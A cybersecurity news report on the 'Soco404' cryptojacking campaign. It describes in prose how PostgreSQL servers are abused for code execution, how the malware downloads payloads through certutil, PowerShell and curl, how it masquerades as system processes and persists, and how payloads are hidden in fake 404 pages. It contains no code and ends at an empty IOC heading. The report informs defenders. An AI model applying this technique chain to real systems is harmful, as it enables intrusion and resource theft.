Warning – Platform-Specific Malware Targeting Linux and Windows Through Fake Error Pages

Cybersecurity researchers at Wiz have uncovered an active cryptomining campaign dubbed “Soco404” that exploits cloud infrastructure vulnerabilities to deploy platform-specific malware targeting both Linux and Windows systems.

The sophisticated operation uses fake 404 error pages hosted on Google Sites to conceal malicious payloads, demonstrating an evolved approach to cryptojacking attacks.

Multi-Vector Attack Strategy Exploits PostgreSQL Misconfigurations

The campaign primarily targets exposed PostgreSQL instances through automated scanning, exploiting weak credentials and misconfigurations to gain initial access.

Attackers leverage PostgreSQL’s COPY FROM PROGRAM functionality to achieve remote code execution, subsequently downloading and executing malicious scripts directly in memory to avoid disk-based detection.

The Linux variant begins with the soco.sh dropper script, which downloads the primary payload from compromised Apache Tomcat servers while eliminating competing miners and clearing forensic evidence from system logs.

The malware employs process masquerading techniques, disguising itself as legitimate system processes, such as “sd-pam” and kernel-related processes, including “[cpuhp/1]” and “[kworker/R-rcu_p]”.

For Windows systems, the attack utilizes multiple fallback methods, including certutil, PowerShell’s Invoke-WebRequest, and curl to download the ok.exe payload.

The Windows variant creates persistent services with random names and attempts to disable Windows event logging to evade detection.

Sophisticated Persistence and Evasion Techniques

Both variants establish robust persistence mechanisms through cron jobs and shell initialization files on Linux systems, while Windows infections create system services for automatic startup.

The malware spawns multiple child processes that communicate via local sockets, creating a resilient network of interconnected components.

A particularly notable aspect involves the use of Google Sites to host fake 404 error pages containing base64-encoded malware embedded within HTML content.

These pages appear as legitimate error messages while serving as command-and-control infrastructure, with the actual payloads hidden between “exe101” markers in the HTML source.

The campaign extends beyond simple cryptomining, with evidence suggesting connections to broader crypto-scam infrastructure, including fraudulent cryptocurrency trading platforms.

Researchers identified multiple domains hosting fake exchanges that claim affiliation with legitimate institutions, such as the Hong Kong Stock Exchange.

Both Linux and Windows payloads ultimately connect to mining pools, including c3pool and moneroocean, using the same Monero wallet address, indicating coordinated operations.

The dynamic number of active workers suggests the campaign remains operational, highlighting the ongoing threat to exposed cloud services.

Organizations are advised to secure PostgreSQL instances, implement proper access controls, and deploy runtime monitoring solutions to detect anomalous database process behavior characteristic of these attacks.

IOC